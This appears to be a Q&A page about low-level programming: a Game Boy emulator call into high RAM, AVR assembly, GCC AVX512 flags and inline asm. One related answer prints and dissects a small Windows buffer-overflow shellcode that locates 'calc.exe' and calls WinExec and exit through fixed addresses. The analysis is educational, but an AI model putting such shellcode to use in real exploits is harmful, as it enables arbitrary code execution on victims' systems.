I'm currently in the process of writing a Gameboy emulator, and I've noticed something that seems strange to me.
My emulator is hitting a jump instruction 0xCD, for example CD B6 FF, but my understanding was that a jump should only be jumping to an address within cartridge ROM (0x7FFF maximum), because I'm assuming the CPU can only execute instructions from ROM, not RAM. The ROM in question is Dr. Mario, which I'd expect to only be carrying out valid operations. 0xFFB6 is in high RAM, which seems odd to me.
Am I correct in my thinking? If I am, presumably that means my program counter is somehow ending up at the wrong address and that the CB is actually part of another instruction's data, and not an instruction itself?
I'd be grateful for some clarification, thanks.
For reference, I've been using Gameboy Opcodes and CPU docs to implement the instructions. I know they contain a few errors, and I think I've accounted for them (for example, 0xE2 being listed as a two-byte instruction, when it's only one)
Just checked Dr. Mario 1.1, it copies the VBlank int routine at hFFB6 at startup, then when VBlank happens, the routine at 0:01A6 is called, which calls the OAM DMA transfer routine.
During OAM DMA transfer, the CPU can only access HRAM, so writing a short routine in HRAM that will wait for the transfer to be completed is required. The OAM DMA transfer takes 160 µs, so you usually make a loop that will wait this amount of time after specifying the OAM transfer source.
This is the part of the initialization routine run at startup that copies the DMA transfer routine to HRAM:
...
ROM0:027E 0E B6 ld c,B6 ;destination hFFB6
ROM0:0280 06 0A ld b,0A ;length 0xA
ROM0:0282 21 86 23 ld hl,2386 ;source 0:2386
ROM0:0285 2A ldi a,(hl) ;copy OAM DMA transfer routine from source
ROM0:0286 E2 ld (ff00+c),a ;paste to destination
ROM0:0287 0C inc c ;destination++
ROM0:0288 05 dec b ;length--
ROM0:0289 20 FA jr nz,0285 ;loop until DMA transfer routine is copied
...
When VBlank happens, it jumps to the routine at 0:01A6:
ROM0:0040 C3 A6 01 jp 01A6
Which contains a call to our OAM DMA transfer routine, waiting for DMA to be completed:
ROM0:01A6 F5 push af
ROM0:01A7 C5 push bc
ROM0:01A8 D5 push de
ROM0:01A9 E5 push hl
ROM0:01AA F0 B1 ld a,(ff00+B1)
ROM0:01AC A7 and a
ROM0:01AD 28 0B jr z,01BA
ROM0:01AF FA F1 C4 ld a,(C4F1)
ROM0:01B2 A7 and a
ROM0:01B3 28 05 jr z,01BA
ROM0:01B5 F0 EF ld a,(ff00+EF)
ROM0:01B7 A7 and a
ROM0:01B8 20 09 jr nz,01C3
ROM0:01BA F0 E1 ld a,(ff00+E1)
ROM0:01BC FE 03 cp a,03
ROM0:01BE 28 03 jr z,01C3
ROM0:01C0 CD B6 FF call FFB6 ;OAM DMA transfer routine is in HRAM
...
OAM DMA transfer routine:
HRAM:FFB6 3E C0 ld a,C0
HRAM:FFB8 E0 46 ld (ff00+46),a ;source is wC000
HRAM:FFBA 3E 28 ld a,28 ;loop start
HRAM:FFBC 3D dec a
HRAM:FFBD 20 FD jr nz,FFBC ;wait for the OAM DMA to be completed
HRAM:FFBF C9 ret ;ret to 0:01C3
Here is my analysis:
Looking for CD B6 FF in the raw ROM I can only find it in one place of the memory which is 0x01C0 (448 in decimal).
So I decided to disassemble the ROM, to see if it is a valid instruction.
I used gb-disasm to disassemble the ROM. Here are the values from 0x150 (ROM start) to address 0x201.
[0x00000100] 0x00 NOP
[0x00000101] 0xC3 0x50 0x01 JP $0150
[0x00000150] 0xC3 0xE8 0x01 JP $01E8
[0x00000153] 0x01 0x0E 0xD0 LD BC,$D00E
[0x00000156] 0x0A LD A,[BC]
[0x00000157] 0xA7 AND A
[0x00000158] 0x20 0x0D JR NZ,$0D ; 0x167
[0x0000015A] 0xF0 0xCF LDH A,[$CF] ; HIMEM
[0x0000015C] 0xFE 0xFE CP $FE
[0x0000015E] 0x20 0x04 JR NZ,$04 ; 0x164
[0x00000160] 0x3E 0x01 LD A,$01
[0x00000162] 0x18 0x01 JR $01 ; 0x165
[0x00000164] 0xAF XOR A
[0x00000165] 0x02 LD [BC],A
[0x00000166] 0xC9 RET
[0x00000167] 0xFA 0x46 0xD0 LD A,[$D046]
[0x0000016A] 0xE0 0x01 LDH [$01],A ; SB
[0x0000016C] 0x18 0xF6 JR $F6 ; 0x164
[0x000001E8] 0xAF XOR A
[0x000001E9] 0x21 0xFF 0xDF LD HL,$DFFF
[0x000001EC] 0x0E 0x10 LD C,$10
[0x000001EE] 0x06 0x00 LD B,$00
[0x000001F0] 0x32 LD [HLD],A
[0x000001F1] 0x05 DEC B
[0x000001F2] 0x20 0xFC JR NZ,$FC ; 0x1F0
[0x000001F4] 0x0D DEC C
[0x000001F5] 0x20 0xF9 JR NZ,$F9 ; 0x1F0
[0x000001F7] 0x3E 0x0D LD A,$0D
[0x000001F9] 0xF3 DI
[0x000001FA] 0xE0 0x0F LDH [$0F],A ; IF
[0x000001FC] 0xE0 0xFF LDH [$FF],A ; IE
[0x000001FE] 0xAF XOR A
[0x000001FF] 0xE0 0x42 LDH [$42],A ; SCY
[0x00000201] 0xE0 0x43 LDH [$43],A ; SCX
The way we have to disassemble a ROM is by following the flow of instructions. For example, we know that the main program starts at position 0x150. So we should start disassembling there. Then we follow instruction by instruction until we hit any JUMP instruction (JP, JR, CALL, RET, etc). From that moment on the flow of the program is forked in two and we should follow both paths to disassemble.
The think to understand here is that if I show you a random memory position in a ROM, you cannot tell me if it is data or instructions. The only way to find out is by following the program flow. We need to define blocks of code that start in a jump destination and end in another jump instruction.
gb-disasm skips any memory position that is not inside a code block. 0x16C marks the end of a block.
[0x0000016C] 0x18 0xF6 JR $F6 ; 0x164
The next block starts on 0x1E8. We know that because it is the destination address of a jump located on 0x150.
[0x00000150] 0xC3 0xE8 0x01 JP $01E8
Memory block from 0x16E until 0x1E8 is not consider a code block. That's why you don't see the memory position 0x01C0 listed as an instruction.
So there you are, it is very likely that you are interpreting the instructions in a wrong way. If you want to be 100% sure, you can disassemble the whole room and check if any instruction points to 0x16E-0x1E8 and reads it as raw data, such as a tile or something.
Please leave a comment if you agree with the analysis.
Related
I am trying to figure out this question. I posted my code below. It doesn't work properly. it seems like its not multiplying the 2 least significant nibbles. I don't know AVR very well.
Write AVR that generates a multiplication table for SRAM addresses 0x0100 to 0x01FF. The value at each address is the product of the two least significant nibbles of the address. For example, at address 0x0123, the multiplicand is 3 and the multiplier is 2. calculate the product (6 in this case) and store it at address 0x0123. The answer should be about 10-12 lines of code with a loop
.include "C:\VMLAB\include\m168def.inc"
ldi r27, 0x01
ldi r26, 0x00
ldi r30, 0xff
main:
mov r16, r26
andi r16,0x0f
mov r17,r27
andi r17,0xf0
swap r17
mul r17, r16
st x+, r16
dec r30
brne main
According to the manual, the MUL instruction stores its result in R0 and R1. So you need to read R0 after MUL, not R16.
You have three errors in your code:
mul stores results to R1:R0 pair registers
if use X as the index register and content mark symbolically as ABCD then CD is located in XL register, not in XH (r27). AB is constant (01)
you loops only 255 times not 256
ldi xh, 0x01
ldi xl, 0x00
ldi r30, 0x00
main:
mov r16, xl ;put D to R16
andi r16,0x0f
mov r17, xl ;put C to R17
andi r17,0xf0
swap r17
mul r17, r16 ;multiply C x D
st x+, r0 ;store result low byte to memory
dec r30 ;repeat 256 times
brne main
Hi I'm trying to build without any avx512 instructions by using those flags:
-march=native -mno-avx512f.
However i still get a binary which has
AVX512 (vmovss) instruction generated (i'm using elfx86exts to check).
Any idea how to disable those ?
-march=native -mno-avx512f is the correct option, vmovss only requires AVX1.
There is an AVX512F EVEX encoding of vmovss, but GAS won't use it unless the register involved is xmm16..31. GCC won't emit asm using those registers when you disable AVX512F with -mno-avx512f, or don't enable it in the first place with something like -march=skylake or -march=znver2.
If you're still not sure, check the actual disassembly + machine code to see what prefix the instruction starts with:
a C5 or C4 byte: start of a 2 or 3 byte VEX prefix, AVX1 encoding.
a 62 byte: start of an EVEX prefix, AVX512F encoding
Example:
.intel_syntax noprefix
vmovss xmm15, [rdi]
vmovss xmm15, [r11]
vmovss xmm16, [rdi]
assembled with gcc -c avx.s and disassemble with objdump -drwC -Mintel avx.o:
0000000000000000 <.text>:
0: c5 7a 10 3f vmovss xmm15,DWORD PTR [rdi] # AVX1
4: c4 41 7a 10 3b vmovss xmm15,DWORD PTR [r11] # AVX1
9: 62 e1 7e 08 10 07 vmovss xmm16,DWORD PTR [rdi] # AVX512F
2 and 3 byte VEX, and 4 byte EVEX prefixes before the 10 opcode. (The ModRM bytes are different too; xmm0 and xmm16 would differ only in the extra register bit from the prefix, not the modrm).
GAS uses the AVX1 VEX encoding of vmovss and other instructions when possible. So you can count on instructions that have a non-AVX512F form to be using the non-AVX512F form whenever possible. This is how the GNU toolchain (used by GCC) makes -mno-avx512f work.
This applies even when the EVEX encoding is shorter. e.g. when a [reg + constant] could use an AVX512 scaled disp8 (scaled by the element width) but the AVX1 encoding would need a 32-bit displacement that counts in bytes.
f: c5 7a 10 bf 00 01 00 00 vmovss xmm15,DWORD PTR [rdi+0x100] # AVX1 [reg+disp32]
17: 62 e1 7e 08 10 47 40 vmovss xmm16,DWORD PTR [rdi+0x100] # AVX512 [reg + disp8*4]
1e: c5 78 28 bf 00 01 00 00 vmovaps xmm15,XMMWORD PTR [rdi+0x100] # AVX1 [reg+disp32]
26: 62 e1 7c 08 28 47 10 vmovaps xmm16,XMMWORD PTR [rdi+0x100] # AVX512 [reg + disp8*16]
Note the last byte, or last 4 bytes, of the machine code encodings: it's a 32-bit little-endian 0x100 byte displacement for the AVX1 encodings, but an 8-bit displacement of 0x40 dwords or 0x10 dqwords for the AVX512 encodings.
But using an asm-source override of {evex} vmovaps xmm0, [rdi+256] we can get the compact encoding even for "low" registers:
62 f1 7c 08 28 47 10 vmovaps xmm0,XMMWORD PTR [rdi+0x100]
GCC will of course not do that with -mno-avx512f.
Unfortunately GCC and clang also miss that optimization when you do enable AVX512F, e.g. when compiling __m128 load(__m128 *p){ return p[16]; } with -O3 -march=skylake-avx512 (Godbolt). Use binary mode, or simply note the lack of an {evex} tag on that asm source line of compiler output.
I found an error in my use-case .. One of the compiled units was dependant on openvino SDK which added -mavx512f flag explicitly.
I am working on a program that is suppose to create a certain blink sequence on my arduino board (atmega328p). The pattern that I am trying to create is,
ON for 1/2 second
OFF for 1/2 second
ON for 1/2 second
Off for one full second
Repeat this sequence.
I approached the problem by creating two different delays one for the 1/2 sec and other for the 1 sec, and then I call them.
If I only have one delay the light will work with that pattern but once I put both delays in the loop together the light does not even follow the pattern. I apologize if this is a easy question, I don't know if I am approaching this right.
Here is my code:
#include "config.h"
.section .data
dummy: .byte 0 ; dummy global variable
.section .text
.global main
.extern delay
.org 0x0000
main:
; clear the SREG register
eor r1, r1 ; cheap zero
out _(SREG), r1 ; clear flag register
; set up the stack
ldi r28, (RAMEND & 0x00ff)
ldi r29, (RAMEND >> 8)
out _(SPH), r29
out _(SPL), r28
; initialize the CPU clock to run at full speed
ldi r24, 0x80
sts CLKPR, r24 ; allow access to clock setup
sts CLKPR, r1 ; run at full speed
; set up the LED port
sbi LED_DIR, LED_PIN ; set LED pin to output
cbi LED_PORT, LED_PIN ; start with the LED off
; enter the blink loop
1: rcall toggle
rcall delay
rcall delay2
rjmp 1b
toggle:
in r24, LED_PORT ; get current bits
ldi r25, (1 << LED_PIN) ; LED is pin 5
eor r24, r25 ; flip the bit
out LED_PORT, r24 ; write the bits back
ret
delay: ; 1/2 sec delay loop
ldi r21, 41
ldi r22, 150
ldi r23, 127
1: dec r23
brne 1b
dec r22
brne 1b
dec r21
brne 1b
ret
delay2: ; 1 sec delay loop
ldi r18, 82
ldi r19, 43
ldi r20, 0
2: dec r20
brne 2b
dec r19
brne 2b
dec r18
brne 2b
ret
I’ve got a shellcode. It opens calculator in my buffer overflow program.
0: eb 16 jmp 0x18
2: 5b pop ebx
3: 31 c0 xor eax,eax
5: 50 push eax
6: 53 push ebx
7: bb 4d 11 86 7c mov ebx,0x7c86114d
c: ff d3 call ebx
e: 31 c0 xor eax,eax
10: 50 push eax
11: bb ea cd 81 7c mov ebx,0x7c81cdea
16: ff d3 call ebx
18: e8 e5 ff ff ff call 0x2
1d: 63 61 6c arpl WORD PTR [ecx+0x6c],sp
20: 63 2e arpl WORD PTR [esi],bp
22: 65 78 65 gs js 0x8a
25: 00 90 90 90 90 90 add BYTE PTR [eax-0x6f6f6f70],dl
2b: 90 nop
2c: 90 nop
2d: 90 nop
2e: 90 nop
2f: 90 nop
Apart from the main question being “What does this shellcode do line by line”, I am particularly interested in:
The jmp operation, why and where does my program jump?
The arpl stuff, I see it for the first time and google does not help me much... Same with GS operation
The jmp 0x18 is a relative jump to offset 0x18, which is practically the end of your code. It then calls address 0x2 (again, relative). This call places the "return address" on the stack, so it could be popped from it, giving you a clue about the address in which this relative shellcode is being executed. And indeed, the pop ebx at offset 0x2 is getting the address from the stack.
I said that 0x18 is the end of the code, because the lines after it are data bytes and not asm opcodes. This is why you see arpl. If you look at the hex values of the bytes, you will see:
calc.exe\0 ==> 0x63 0x61 0x63 0x6c 0x2e 0x65 0x78 0x65 0x00
Edited:
The full flow of the shellcode is:
jmp 0x18 - jump to to the last code instruction of the shellcode
call 0x2 - returns to offset 2, and stores the address of offset 0x1D on the stack
pop ebx - ebx := address from the stack, which is the address of the string "calc.exe"
xor eax,eax - common opcode to zero the register: eax := 0
push eax - push the value 0 as the second argument for a future function call
push ebx - push the pointer to "calc.exe" as the first argument for a future function call
mov ebx,0x7c86114d - ebx will be a fixed address (probably WinExec)
call ebx - call the function: WinExec("calc.exe", 0)
xor eax,eax - again, eax := 0
push eax - push the value 0 as the first argument for a future function call
mov ebx,0x7c81cdea - ebx will be a fixed address (probably exit)
call ebx - call the function: exit(0)
I have the following assembly code:
__asm__ __volatile__ (
"1: subi %0, 1" "\n\t"
"brne 1b"
: "=d" (__count)
: "M" (__count));
which results in the following compiler ouptut
ce: 81 50 subi r24, 0x01 ; 1
d0: f1 f7 brne .-4 ; 0xce <main>
d2: 80 e0 ldi r24, 0x00 ; 0
d4: 90 e0 ldi r25, 0x00 ; 0
How can i achieve the following:
ce: 81 50 subi r16, 0x01 ; 1
d0: f1 f7 brne .-4 ; 0xce <main>
d2: 80 e0 ldi r16, 0x00 ; 0
Is it even possible to tell the compiler to use r16 instead of r24:r25? That way i can reduce the cycle count by 1 which is used by the ldi r25,0x00 line.
Thanks
Jack
This question is old and you most certainly already solved it, but for archiving purposes, let me answer it: yes, you can. Declare __count like this:
register <type> __count __asm__ ("r16");
And voilá! Using the GNU extension explicit register variables, you've declared that the C variable __count should always be placed in r16 wherever it is used - including outside of an ASM call.
Note that this declaration should have local scope, otherwise the compiler will avoid using this register in other functions.
Check out this: http://www.nongnu.org/avr-libc/user-manual/inline_asm.html#io_ops
It seems you can't force it to use a specific register. However, if you use "=a" instead of "=d" you would restrict it to registers r16..r23 which should be what you want (because you just don't want it to use the 'paired' registers r24/r25)